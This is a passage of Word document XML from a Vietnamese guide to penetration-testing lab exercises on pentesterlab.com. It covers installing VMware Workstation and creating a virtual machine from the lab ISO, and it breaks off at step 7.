        <w:tab/>
        <w:t xml:space="preserve">103 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD54748" w14:textId="65C2FDEE" w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:anchor="_Toc357225424" w:history="1">
        <w:r w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>TÀI LIỆU THAM KHẢO</w:t>
        </w:r>
        <w:r w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:webHidden/>
            <w:color w:val="auto"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3AC33" w14:textId="4E3F22F3" w:rsidR="009815BF" w:rsidRPr="00606BAC" w:rsidRDefault="00AC2A7A" w:rsidP="00606BAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FA2235" w:rsidRPr="00606BAC">
        <w:t xml:space="preserve">CHƯƠNG I: </w:t>
      </w:r>
      <w:r w:rsidR="009815BF" w:rsidRPr="00606BAC">
        <w:t>HƯỚNG DẪN CÀI ĐẶT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F5663" w14:textId="169E5F77" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tất cả các bài tập thực hành này được </w:t>
      </w:r>
      <w:r w:rsidR="003D036F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">chúng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>tôi demo và thực hiện thông qua trang web pentesterlab.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E51C3FF" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trước khi tiến hành khai thác ta cần tiến hành cài đặt máy chủ ảo VMware hoặc Virtualbox trên máy tính của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8D1AB" w14:textId="28548302" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta truy cập vào trang chủ Vmware,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>truy cập vào Downloads, tiến hành tải về phiên bản VMware Workstation 16 Pro for Windows cho người sử dụng máy tính hệ điệu hành Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F08AA1" w14:textId="2BCC5B03"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2F2C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3" o:spid="_x0000_i1025" type="#_x0000_t75" style="width:456pt;height:207.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId10" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802FF8F" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo ta tiến hành cài đặt ứng dụng vào máy tính của mình bằng cách nháy chuột phải vào ứng dụng chọn open hoặc Run as administrator, sau đó chỉ cẩn đồng ý các điều khoản của ứng dụng và chờ quá trình cài đặt kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612C5D9" w14:textId="611B1AFD" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="240CB670">
          <v:shape id="Hình ảnh 7" o:spid="_x0000_i1026" type="#_x0000_t75" style="width:345pt;height:60.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="593CF8D0" w14:textId="4D32B6D2" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi quá trình cài đặt kết thúc ta tiến hành restart máy tính của mình và khởi chạy lại ứng dụng VMware,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>màn hình chính của giao diện xuất hiện là ta đã cài đặt thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13221B62" w14:textId="68D68ECF" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7AC703F3">
          <v:shape id="Hình ảnh 10" o:spid="_x0000_i1634" type="#_x0000_t75" style="width:336pt;height:170.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId12" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E812D95" w14:textId="5DF3052F" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Như vậy quá trình cài đặt đã hoàn tất,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ta tiến hành thực hiện bài tập lab1.Đầu tiền ta truy cập vào trang pentesterlab,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>tiến hành tải file ISO về.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta được kết quả như hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE82B2" w14:textId="59C36C64" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1BB70240">
          <v:shape id="Hình ảnh 9" o:spid="_x0000_i1028" type="#_x0000_t75" style="width:408.75pt;height:229.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId13" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8D124" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi quá trình tải file hoàn tất ta tiến hành cài đặt file ISO bằng máy ảo VMware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C09D3" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Các bước cài đặt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1C2E3" w14:textId="4F1AB1DE" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: chọn File&gt;New Virtual Machine</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(Ctrl+N).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215E5323" w14:textId="5BF9837E"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0FA24EFE">
          <v:shape id="Hình ảnh 11" o:spid="_x0000_i1029" type="#_x0000_t75" style="width:340.5pt;height:185.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId14" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA822EF" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 2: Chọn Typical&gt;Next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50EDA9" w14:textId="5D5105AA"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4B6424DC">
          <v:shape id="Hình ảnh 12" o:spid="_x0000_i1030" type="#_x0000_t75" style="width:350.25pt;height:252.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId15" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA4722" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B47BBEC" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 3: Chọn Browse&gt;chọn đường dẫn mà bạn lưu file ISO vừa downloads&gt;Nhấn Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00F4AB" w14:textId="2D303A2F"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17F02945">
          <v:shape id="Hình ảnh 14" o:spid="_x0000_i1031" type="#_x0000_t75" style="width:344.25pt;height:250.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId16" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B73D34" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB3E21D" w14:textId="7596AE38" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn Virtual machine để đặt tên cho máy ảo,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Location: nhấn vào biểu tượng Browse chọn thư mục mà bạn muốn lưu file cài đặt.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sao khi hoàn tất nhấn Next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F62D82" w14:textId="7A647D9F"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7628A222">
          <v:shape id="Hình ảnh 17" o:spid="_x0000_i1032" type="#_x0000_t75" style="width:240.75pt;height:39pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C85D4" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E6F94C" w14:textId="324AE3C1" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="44B57323">
          <v:shape id="Hình ảnh 18" o:spid="_x0000_i1033" type="#_x0000_t75" style="width:230.25pt;height:45.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId18" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF9044C" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F6A5EF" w14:textId="409C1146"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529E799A">
          <v:shape id="Hình ảnh 16" o:spid="_x0000_i1034" type="#_x0000_t75" style="width:399pt;height:273pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId19" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48AD0C" w14:textId="30A68AD0" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 5: chọn kích thước bộ nhớ để lưu trữ file cài đặt máy ảo.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tùy thuộc vào điều kiện bộ nhớ máy tính của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>bạn.Ở</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đây tôi chọn kích thước là 20GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E237C6E" w14:textId="45B6ADD7" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="56B70138">
          <v:shape id="Hình ảnh 21" o:spid="_x0000_i1035" type="#_x0000_t75" style="width:195pt;height:47.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId20" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52693DFC" w14:textId="002819C5" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn chế độ Split virtual disk into multiple files.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Nhấn Next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BC4F7" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693FF817" w14:textId="086A6115" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3B773038">
          <v:shape id="Hình ảnh 19" o:spid="_x0000_i1036" type="#_x0000_t75" style="width:397.5pt;height:285.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId21" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D8BAE" w14:textId="77777777" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 6: Nhấn finish và ta được kết quả như hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46847FAE" w14:textId="4F2BAFF8" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00640205">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="13836584">
          <v:shape id="Hình ảnh 22" o:spid="_x0000_i1037" type="#_x0000_t75" style="width:394.5pt;height:233.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId22" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64231E82" w14:textId="1D3C3FA6" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 7:</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
